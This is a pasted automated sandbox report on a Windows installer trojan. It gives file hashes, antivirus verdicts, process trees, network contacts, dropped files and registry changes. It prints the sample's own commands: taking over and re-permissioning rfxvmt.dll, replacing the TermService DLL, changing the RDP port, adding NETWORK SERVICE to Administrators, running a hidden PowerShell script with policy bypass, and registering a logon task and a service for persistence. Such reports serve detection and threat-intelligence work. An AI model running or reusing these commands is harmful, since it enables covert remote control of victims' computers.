Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- * MalFamily: "Malicious"
- * MalScore: 10.0
- * File Name: "Exes_d2a062ca772fa3ace7c7edadbd95eaf7.exe"
- * File Size: 3038197
- * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive"
- * SHA256: "286c980e3caf90286482d6af0de30e4865599f5d8241957344f92b97b6fb88d6"
- * MD5: "d2a062ca772fa3ace7c7edadbd95eaf7"
- * SHA1: "dc13b73487e153711a3955a2ce6678881b3ffc7c"
- * SHA512: "73cd04708c5db5b96622370f756dbed08a0a9dadee739e389d4a9c7fe0f8b146afd4201f738913126e5a220345ac5842f59bcba6e7a9e320d22975701b63016c"
- * CRC32: "41ECBD26"
- * SSDEEP: "49152:94GyKQCCrxxMN7QyaZD6caRSDDqjdeLqybDTefAJR2hcSDrd6V83JY:9zICIMN7QycaRSDDqoLbDwrhcOQi5Y"
- * Process Execution:
- "Exes_d2a062ca772fa3ace7c7edadbd95eaf7.exe",
- "cmd.exe",
- "powershell.exe",
- "takeown.exe",
- "icacls.exe",
- "icacls.exe",
- "icacls.exe",
- "icacls.exe",
- "icacls.exe",
- "icacls.exe",
- "icacls.exe",
- "reg.exe",
- "reg.exe",
- "net.exe",
- "net1.exe",
- "cmd.exe",
- "cmd.exe",
- "services.exe",
- "svchost.exe",
- "WmiPrvSE.exe",
- "WmiPrvSE.exe",
- "svchost.exe",
- "cmd.exe",
- "rundll32.exe",
- "svchost.exe",
- "taskhost.exe",
- "svchost.exe",
- "taskhost.exe",
- "svchost.exe",
- "WerFault.exe",
- "wermgr.exe",
- "rundll32.exe",
- "cmd.exe",
- "rundll32.exe",
- "cmd.exe",
- "updsvc.exe",
- "cmd.exe",
- "schtasks.exe",
- "svchost.exe",
- "taskeng.exe",
- "WerFault.exe",
- "lsm.exe"
- * Executed Commands:
- "\"C:\\Windows\\system32\\cmd.exe\" /C powershell -ExecutionPolicy Bypass -f C:\\Users\\user\\AppData\\Local\\Temp\\shipkat.ps1",
- "powershell -ExecutionPolicy Bypass -f C:\\Users\\user\\AppData\\Local\\Temp\\shipkat.ps1",
- "\"C:\\Windows\\system32\\takeown.exe\" /A /F rfxvmt.dll",
- "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /inheritance:d",
- "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /setowner \"NT SERVICE\\TrustedInstaller\"",
- "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /grant \"NT SERVICE\\TrustedInstaller:F\"",
- "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /remove \"NT AUTHORITY\\SYSTEM\"",
- "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /grant \"NT AUTHORITY\\SYSTEM:RX\"",
- "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /remove BUILTIN\\Administrators",
- "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /grant BUILTIN\\Administrators:RX",
- "\"C:\\Windows\\system32\\reg.exe\" ADD \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v PortNumber /t REG_DWORD /d 0x1C21 /f",
- "\"C:\\Windows\\system32\\reg.exe\" add HKLM\\system\\currentcontrolset\\services\\TermService\\parameters /v ServiceDLL /t REG_EXPAND_SZ /d %SystemRoot%\\help\\hlp11.dat /f",
- "\"C:\\Windows\\system32\\net.exe\" localgroup Administrators \"NT AUTHORITY\\NETWORK SERVICE\" /add",
- "\"C:\\Windows\\system32\\cmd.exe\" /c del %temp%\\*.ps1 /f",
- "\"C:\\Windows\\system32\\cmd.exe\" /c del %temp%\\*.txt /f",
- "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding",
- "C:\\Windows\\system32\\net1 localgroup Administrators \"NT AUTHORITY\\NETWORK SERVICE\" /add",
- "C:\\Windows\\System32\\svchost.exe -k NetworkService",
- "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted",
- "taskhost.exe $(Arg0)",
- "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
- "C:\\Windows\\system32\\rundll32.exe c:\\windows\\help\\hlp12.dat, deployns",
- "cmd.exe /c rundll32.exe c:\\windows\\help\\hlp12.dat, deployns",
- "C:\\Windows\\system32\\WerFault.exe -u -p 2632 -s 288",
- "\"C:\\Windows\\system32\\wermgr.exe\" \"-queuereporting_svc\" \"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_d9cea5d53964d256a96f47a4e221d2152335d_cab_091a14dd\"",
- "rundll32.exe c:\\windows\\help\\hlp12.dat, deployns",
- "cmd.exe /c C:\\Windows\\system32\\rundll32.exe c:\\windows\\help\\hlp12.dat,, deployns ns launch",
- "C:\\Windows\\system32\\rundll32.exe c:\\windows\\help\\hlp12.dat,, deployns ns launch",
- "cmd.exe /c start c:\\windows\\temp\\updsvc.exe",
- "cmd.exe /c schtasks /create /tn \"updsvc\" /tr \"c:\\windows\\temp\\updsvc.exe\" /sc onlogon /f",
- "c:\\windows\\temp\\updsvc.exe",
- "schtasks /create /tn \"updsvc\" /tr \"c:\\windows\\temp\\updsvc.exe\" /sc onlogon /f",
- "\"c:\\windows\\temp\\GetUserLang.exe\"",
- "taskeng.exe 1C9308F0-8A41-4006-B814-D2F5B13BEDB5 S-1-5-18:NT AUTHORITY\\System:Service:",
- "taskeng.exe 8D661787-E909-433D-BDE3-477DCB39306A S-1-5-21-0000000000-0000000000-0000000000-1000:Host\\user:Interactive:1",
- "\"C:\\Program Files\\Common Files\\Microsoft Shared\\Office15\\OLicenseHeartbeat.exe\""
- * Signatures Detected:
- "Description": "At least one process apparently crashed during execution",
- "Details":
- "Description": "Creates RWX memory",
- "Details":
- "Description": "Possible date expiration check, exits too soon after checking local time",
- "Details":
- "process": "cmd.exe, PID 980"
- "Description": "Attempts to connect to a dead IP:Port (5 unique times)",
- "Details":
- "IP": "185.225.17.169:443"
- "IP": "8.250.93.254:80"
- "IP": "185.225.17.169:80"
- "IP": "185.225.17.66:443"
- "IP": "192.35.177.64:80"
- "Description": "Loads a driver",
- "Details":
- "driver service name": "\\Registry\\Machine\\System\\CurrentControlSet\\Services\\RDPDR"
- "Description": "Expresses interest in specific running processes",
- "Details":
- "process": "rundll32.exe"
- "process": "winlogon.exe"
- "process": "explorer.exe"
- "Description": "Reads data out of its own binary image",
- "Details":
- "self_read": "process: Exes_d2a062ca772fa3ace7c7edadbd95eaf7.exe, pid: 1500, offset: 0x00000000, length: 0x002e5bf1"
- "self_read": "process: Exes_d2a062ca772fa3ace7c7edadbd95eaf7.exe, pid: 1500, offset: 0x00008c1c, length: 0x002dcfd9"
- "Description": "A process created a hidden window",
- "Details":
- "Process": "Exes_d2a062ca772fa3ace7c7edadbd95eaf7.exe -> \"C:\\Windows\\system32\\cmd.exe\""
- "Process": "rundll32.exe -> cmd.exe"
- "Process": "rundll32.exe -> cmd.exe"
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details":
- "post_no_referer": "HTTP traffic contains a POST request with no referer header"
- "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
- "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
- "suspicious_request": "http://185.225.17.66:443/http://185.225.17.66/fakeurl.htm"
- "suspicious_request": "http://geo.netsupportsoftware.com/location/loca.asp"
- "Description": "Performs some HTTP requests",
- "Details":
- "url": "http://apps.identrust.com/roots/dstrootcax3.p7c"
- "url": "http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab"
- "url": "http://letitbe.icu/2.txt"
- "url": "http://185.225.17.66:443/http://185.225.17.66/fakeurl.htm"
- "url": "http://geo.netsupportsoftware.com/location/loca.asp"
- "Description": "Deletes its original binary from disk",
- "Details":
- "Description": "Tries to suspend Cuckoo threads to prevent logging of malicious activity",
- "Details":
- "Process": "svchost.exe (1760)"
- "Description": "Attempts to stop active services",
- "Details":
- "servicename": "UmRdpService"
- "Description": "A process attempted to delay the analysis task by a long amount of time.",
- "Details":
- "Process": "lsm.exe tried to sleep 435 seconds, actually delayed analysis time by 0 seconds"
- "Process": "powershell.exe tried to sleep 300 seconds, actually delayed analysis time by 0 seconds"
- "Process": "updsvc.exe tried to sleep 356 seconds, actually delayed analysis time by 0 seconds"
- "Process": "WmiPrvSE.exe tried to sleep 900 seconds, actually delayed analysis time by 0 seconds"
- "Process": "svchost.exe tried to sleep 4985 seconds, actually delayed analysis time by 0 seconds"
- "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
- "Details":
- "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 10986021 times"
- "Description": "Attempts to execute a Living Off The Land Binary command for post exeploitation",
- "Details":
- "MITRE T1078 - schtask": "(Tactic: Execution, Persistence, Privilege Escalation)"
- "Description": "Installs itself for autorun at Windows startup",
- "Details":
- "service name": "RunAsSystem1224"
- "service path": "C:\\Windows\\system32\\rundll32.exe c:\\windows\\help\\hlp12.dat, deployns "
- "key": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RunAsSystem1224\\ImagePath"
- "data": "C:\\Windows\\system32\\rundll32.exe c:\\windows\\help\\hlp12.dat, deployns "
- "key": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\Parameters\\ServiceDLL"
- "data": "%SystemRoot%\\help\\hlp11.dat"
- "task": "cmd.exe /c schtasks /create /tn \"updsvc\" /tr \"c:\\windows\\temp\\updsvc.exe\" /sc onlogon /f"
- "Description": "Creates a hidden or system file",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF160e5ac.TMP"
- "file": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft"
- "file": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache"
- "file": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData"
- "file": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content"
- "file": "C:\\Windows\\Temp\\client32.exe"
- "file": "C:\\Windows\\Temp\\HTCTL32.DLL"
- "file": "C:\\Windows\\Temp\\msvcr100.dll"
- "file": "C:\\Windows\\Temp\\nskbfltr.inf"
- "file": "C:\\Windows\\Temp\\NSM.ini"
- "file": "C:\\Windows\\Temp\\NSM.LIC"
- "file": "C:\\Windows\\Temp\\pcicapi.dll"
- "file": "C:\\Windows\\Temp\\PCICHEK.DLL"
- "file": "C:\\Windows\\Temp\\PCICL32.DLL"
- "file": "C:\\Windows\\Temp\\remcmdstub.exe"
- "file": "C:\\Windows\\Temp\\TCCTL32.DLL"
- "Description": "File has been identified by 24 Antiviruses on VirusTotal as malicious",
- "Details":
- "Bkav": "HW32.Packed."
- "FireEye": "Generic.mg.d2a062ca772fa3ac"
- "Qihoo-360": "HEUR/QVM20.1.8D73.Malware.Gen"
- "McAfee": "Artemis!D2A062CA772F"
- "Cylance": "Unsafe"
- "Alibaba": "Trojan:Win32/Scrami.8a399acb"
- "Symantec": "ML.Attribute.HighConfidence"
- "APEX": "Malicious"
- "Paloalto": "generic.ml"
- "Kaspersky": "HEUR:Trojan.Win32.Scrami.gen"
- "Avast": "Win32:Malware-gen"
- "DrWeb": "Trojan.MulDrop9.28262"
- "Invincea": "heuristic"
- "McAfee-GW-Edition": "BehavesLike.Win32.PUPXCI.vc"
- "Trapmine": "malicious.moderate.ml.score"
- "SentinelOne": "DFI - Malicious PE"
- "Microsoft": "Trojan:Win32/Zpevdo.A"
- "Endgame": "malicious (high confidence)"
- "AegisLab": "Trojan.Win32.Scrami.4!c"
- "ZoneAlarm": "HEUR:Trojan.Win32.Scrami.gen"
- "Acronis": "suspicious"
- "AVG": "Win32:Malware-gen"
- "Cybereason": "malicious.487e15"
- "CrowdStrike": "win/malicious_confidence_100% (D)"
- "Description": "Checks the system manufacturer, likely for anti-virtualization",
- "Details":
- "Description": "Attempts to create or modify system certificates",
- "Details":
- "Description": "Created network traffic indicative of malicious activity",
- "Details":
- "signature": "ET DNS Query to a *.pw domain - Likely Hostile"
- * Started Service:
- "TermService",
- "WerSvc",
- "UmRdpService",
- "RunAsSystem1224"
- * Mutexes:
- "Global\\CLR_CASOFF_MUTEX",
- "TSLicensingLock",
- "CicLoadWinStaWinSta0",
- "Local\\MSCTF.CtfMonitorInstMutexDefault1",
- "Local\\WERReportingForProcess2632",
- "Global\\\\xe5\\x88\\x90\\xc2\\x90",
- "Global\\\\xed\\x95\\xb0\\xc7\\x8f",
- "WERUI_BEX64-d9cea5d53964d256a96f47a4e221d2152335d"
- * Modified Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\shipkat.ps1",
- "C:\\Users\\user\\AppData\\Local\\Temp\\changes_765543.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\nsxA9DA.tmp\\System.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk",
- "\\??\\PIPE\\srvsvc",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\170M8EJSQ3YRP9VT3GBJ.temp",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF160e5ac.TMP",
- "C:\\Windows\\Help\\hlp11.dat",
- "C:\\Windows\\Help\\hlp12.dat",
- "C:\\Windows\\Help\\hlp13.dat",
- "C:\\Windows\\sysnative\\rfxvmt.dll",
- "C:\\Windows\\Temp\\desk.txt",
- "C:\\Windows\\inf\\setupapi.dev.log",
- "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
- "\\??\\PIPE\\samr",
- "\\??\\PIPE\\lsarpc",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\5869f1c1-01d7-41f7-84b7-715672259fa8",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\4963ad21-c4a5-42a5-b9bd-e441d57204fe",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\7c74d58e-3ad2-4500-acb9-a97c9d5ed2aa",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\mod.txt",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\dawerwer3434asdf3.dat",
- "C:\\Windows\\Help\\35279.ps1",
- "\\Device\\Termdd",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\aa.txt",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\E0F5C59F9FA661F6F4C50B87FEF3A15A",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\E0F5C59F9FA661F6F4C50B87FEF3A15A",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\Cab8E67.tmp",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\Tar8E78.tmp",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\rep933.bin",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\rep898.zip",
- "C:\\Windows\\Temp\\client32.exe",
- "C:\\Windows\\Temp\\client32.ini",
- "C:\\Windows\\Temp\\HTCTL32.DLL",
- "C:\\Windows\\Temp\\msvcr100.dll",
- "C:\\Windows\\Temp\\nskbfltr.inf",
- "C:\\Windows\\Temp\\NSM.ini",
- "C:\\Windows\\Temp\\NSM.LIC",
- "C:\\Windows\\Temp\\pcicapi.dll",
- "C:\\Windows\\Temp\\PCICHEK.DLL",
- "C:\\Windows\\Temp\\PCICL32.DLL",
- "C:\\Windows\\Temp\\remcmdstub.exe",
- "C:\\Windows\\Temp\\TCCTL32.DLL",
- "C:\\Windows\\Temp\\cksini.exe",
- "C:\\Windows\\Temp\\updsvc.exe",
- "\\Device\\RdpDr",
- "\\??\\root#umbus#0000#65a9a6cf-64cd-480b-843e-32c86e1ba19f",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA4CE.tmp.appcompat.txt",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAA1E.tmp.WERInternalMetadata.xml",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAA7D.tmp.hdmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB943.tmp.mdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_d9cea5d53964d256a96f47a4e221d2152335d_cab_091a14dd\\WERA4CE.tmp.appcompat.txt",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_d9cea5d53964d256a96f47a4e221d2152335d_cab_091a14dd\\WERAA1E.tmp.WERInternalMetadata.xml",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_d9cea5d53964d256a96f47a4e221d2152335d_cab_091a14dd\\WERAA7D.tmp.hdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_d9cea5d53964d256a96f47a4e221d2152335d_cab_091a14dd\\WERB943.tmp.mdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_d9cea5d53964d256a96f47a4e221d2152335d_cab_091a14dd\\Report.wer",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_d9cea5d53964d256a96f47a4e221d2152335d_cab_091a14dd\\Report.wer.tmp",
- "C:\\Windows\\Temp\\mod.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\mod.txt",
- "C:\\Windows\\sysnative\\Tasks\\updsvc",
- "\\Device\\LanmanDatagramReceiver",
- "C:\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb",
- "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edb.chk",
- "C:\\Windows\\appcompat\\Programs\\RecentFileCache.bcf"
- * Deleted Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\nsgA7A6.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\nsxA9DA.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\nsxA9DA.tmp\\System.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\nsxA9DA.tmp\\",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF160e5ac.TMP",
- "C:\\Users\\user\\AppData\\Local\\Temp\\changes_765543.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\shipkat.ps1",
- "C:\\Users\\user\\AppData\\Local\\Temp\\Exes_d2a062ca772fa3ace7c7edadbd95eaf7.exe",
- "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\security.config.cch.1572.23127796",
- "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.1572.23127796",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\64bit\\security.config.cch.1572.23127796",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\Cab8E67.tmp",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\Tar8E78.tmp",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\rep933.bin",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\rep898.zip",
- "C:\\Windows\\Temp\\client32.exe",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA4CE.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA4CE.tmp.appcompat.txt",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAA1E.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAA1E.tmp.WERInternalMetadata.xml",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAA7D.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAA7D.tmp.hdmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB943.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB943.tmp.mdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_d9cea5d53964d256a96f47a4e221d2152335d_cab_091a14dd\\Report.wer.tmp",
- "C:\\Windows\\Tasks\\updsvc.job",
- "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log"
- * Modified Registry Keys:
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Device Installer\\CurrentStatus",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Device Installer\\CurrentStatus\\StartTime",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Device Installer\\CurrentStatus\\Progress",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29\\00000009",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29\\00000009\\00000000",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29\\00000009\\00000000\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29\\00000009\\00000000\\Data",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\SetupapiLogStatus",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\SetupapiLogStatus\\setupapi.dev.log",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\PortNumber",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\Parameters\\ServiceDLL",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\UmRdpService\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RunAsSystem1224",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RunAsSystem1224\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RunAsSystem1224\\Start",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RunAsSystem1224\\ErrorControl",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RunAsSystem1224\\ImagePath",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RunAsSystem1224\\DisplayName",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RunAsSystem1224\\ObjectName",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RunAsSystem1224\\DeleteFlag",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\fDenyTSConnections",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\FSingleSessionPerUser",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\LimitBlankPasswordUse",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Licensing Core",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\Licensing Core\\EnableConcurrentSessions",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\AllowMultipleTSSessions",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\WgaUtilAcc",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services\\fAllowToGetHelp",
- "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Terminal Server\\RCM\\Secrets",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\Secrets\\L$HYDRAENCKEY_28ada6da-d622-11d1-9cb9-00c04fb16e75",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\Certificate",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\Secrets\\L$HYDRAENCKEY_52d1ad03-4565-44f3-8bfd-bbb0591f4b9d",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\CertificateOld",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\\Blob",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent\\DefaultConsent",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\4CBF3D1D-5FEB-4971-B977-59608B4DCACE\\Path",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\4CBF3D1D-5FEB-4971-B977-59608B4DCACE\\Hash",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\updsvc\\Id",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\updsvc\\Index",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\4CBF3D1D-5FEB-4971-B977-59608B4DCACE\\Triggers",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\4CBF3D1D-5FEB-4971-B977-59608B4DCACE\\DynamicInfo",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\ED0D73D7-BC97-46E2-AC55-FD6EB3F72C05\\DynamicInfo",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\1C9308F0-8A41-4006-B814-D2F5B13BEDB5",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\B17E070E-57E3-43F6-96F5-A9A9C921DEBF\\DynamicInfo",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\8D661787-E909-433D-BDE3-477DCB39306A",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\DF000DCA-3FA2-48A6-9E59-C0606F9F8D73\\DynamicInfo",
